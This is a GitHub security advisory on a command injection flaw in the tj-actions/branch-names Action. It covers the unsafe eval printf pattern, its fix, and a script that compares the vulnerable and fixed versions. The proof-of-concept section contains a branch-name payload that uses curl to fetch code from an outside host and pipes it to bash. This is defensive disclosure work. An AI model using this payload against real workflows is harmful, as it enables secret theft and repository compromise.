ghsa-gq52-6phf-x2r6
Vulnerability from github
Published
2025-07-25 19:28
Modified
2025-07-28 13:00
Severity
CRITICAL
Summary
tj-actions/branch-names has a Command Injection Vulnerability
Details

Overview

A critical vulnerability has been identified in the tj-actions/branch-names GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.

Technical Details

The vulnerability stems from the unsafe use of the `eval printf "%s"` pattern within the action's codebase. Although initial sanitization using `printf "%q"` properly escapes untrusted input, subsequent unescaping via `eval printf "%s"` reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:

```bash
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT"
echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"
```

This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.

Proof-of-Concept (PoC)

  1. Create a branch with the name $(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash).
  2. Trigger the vulnerable workflow by opening a pull request into the target repository.
  3. Observe arbitrary code execution in the workflow logs.

Example output:

```bash
Running on a pull request branch.
Run echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  shell: /usr/bin/bash -e {0}
Running on pr: === PoC script executed successfully ===
Runner user: runner
```

Impact

This vulnerability enables arbitrary command execution in repositories consuming outputs from tj-actions/branch-names. The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event. Potential consequences include:

  • Theft of sensitive secrets stored in the repository.
  • Unauthorized write access to the repository.
  • Compromise of the repository's integrity and security.

Mitigation and Resolution

To address this vulnerability, the unsafe `eval printf "%s"` pattern must be replaced with safer alternatives. Specifically, direct `printf` calls can achieve the same functionality without unescaping shell-unsafe characters. Below is the recommended fix:

```bash
printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
printf "head_ref_branch=%s\n" "$HEAD_REF" >> "$GITHUB_OUTPUT"
printf "ref_branch=%s\n" "$REF_BRANCH" >> "$GITHUB_OUTPUT"
printf "tag=%s\n" "$TAG" >> "$GITHUB_OUTPUT"
```

This approach ensures that all outputs remain properly escaped and safe for downstream consumption.
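The following script is an added, constructed example (not code from tj-actions/branch-names) that walks a branch name containing shell metacharacters through both the vulnerable `eval printf "%s"` step from the Technical Details section and the direct `printf` fix above, then goes one step further than the advisory text by simulating the consuming `run:` step that interpolates the output. The function names, the temporary output file and the sample branch name are this example's own.

```shell
#!/usr/bin/env bash
# Added, constructed example: not code from tj-actions/branch-names. Function
# names and the sample branch name are this example's own.

# Constructed branch name with shell metacharacters; the embedded command is harmless.
BRANCH_NAME='feature/$(echo injected);id'

# The action's sanitization step: bash's printf %q produces a shell-escaped literal.
sanitize() {
  bash -c 'printf "%q" "$1"' _ "$1"
}

# Vulnerable pattern from the advisory: eval undoes the %q escaping, so the raw
# metacharacters are written into the GITHUB_OUTPUT-style file ($1).
emit_unsafe() {
  ref=$(sanitize "$BRANCH_NAME")
  echo "base_ref_branch=$(eval printf "%s" "$ref")" >> "$1"
}

# Fixed pattern: a direct printf keeps the %q-escaped form intact.
emit_safe() {
  ref=$(sanitize "$BRANCH_NAME")
  printf 'base_ref_branch=%s\n' "$ref" >> "$1"
}

# Read one key's value back out of a GITHUB_OUTPUT-style key=value file.
read_output() {
  sed -n "s/^$2=//p" "$1"
}

# Simulate a consuming step that places the output in a run: script via
# ${{ steps.branch.outputs.base_ref_branch }}: GitHub substitutes the expression
# textually before the shell starts, which bash -c on the assembled string mirrors.
consume() {
  bash -c "echo \"branch: $1\""
}

# Run one variant ("unsafe" or "safe") end to end and return the consumer's log line.
demo() {
  out=$(mktemp)
  emit_"$1" "$out"
  value=$(read_output "$out" base_ref_branch)
  rm -f "$out"
  consume "$value"
}

demo unsafe   # the consumer executes the embedded $(echo injected)
demo safe     # the escaped form is echoed verbatim, nothing runs
```

The escaped form survives the consumer's double quotes with its backslashes mostly intact, so consumers that need the plain branch name should still pass the output through an `env:` entry rather than interpolating `${{ }}` into `run:` directly, as the GitHub Security Lab guide in the References recommends.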

Recommendations

  1. Immediate Action: Developers using the tj-actions/branch-names action should update their workflows to the latest major version, v9 (https://github.com/tj-actions/branch-names/releases/tag/v9.0.0).

References

  • GitHub Actions Security Guide: https://securitylab.github.com/resources/github-actions-untrusted-input/
  • How to Secure GitHub Actions Workflows: https://github.blog/security/application-security/how-to-secure-your-github-actions-workflows-with-codeql/
  • Related Vulnerability: GHSA-mcph-m25j-8j63: https://github.com/tj-actions/changed-files/security/advisories/GHSA-mcph-m25j-8j63
  • Template Injection Advisory: GHSA-8v8w-v8xg-79rf: https://github.com/tj-actions/branch-names/security/advisories/GHSA-8v8w-v8xg-79rf
  • This advisory on GitHub: https://github.com/tj-actions/branch-names/security/advisories/GHSA-gq52-6phf-x2r6
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-54416
  • Commit referenced by the advisory: https://github.com/tj-actions/branch-names/commit/e497ceb8ccd43fd9573cf2e375216625bc411d1f
  • Package: https://github.com/tj-actions/branch-names
  • Release v9.0.0: https://github.com/tj-actions/branch-names/releases/tag/v9.0.0

Record details

Advisory ID
GHSA-gq52-6phf-x2r6
Aliases
CVE-2025-54416
Affected package
tj-actions/branch-names (ecosystem: GitHub Actions)
Affected versions
<= 8.2.1 (introduced in 0, fixed in 9.0.0)
CWE
CWE-77
CVSS v3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L (severity: CRITICAL)
GitHub reviewed
2025-07-25T19:28:22Z
NVD published
2025-07-26T04:16:10Z
Published
2025-07-25T19:28:22Z
Modified
2025-07-28T13:00:31Z
Schema version
1.4.0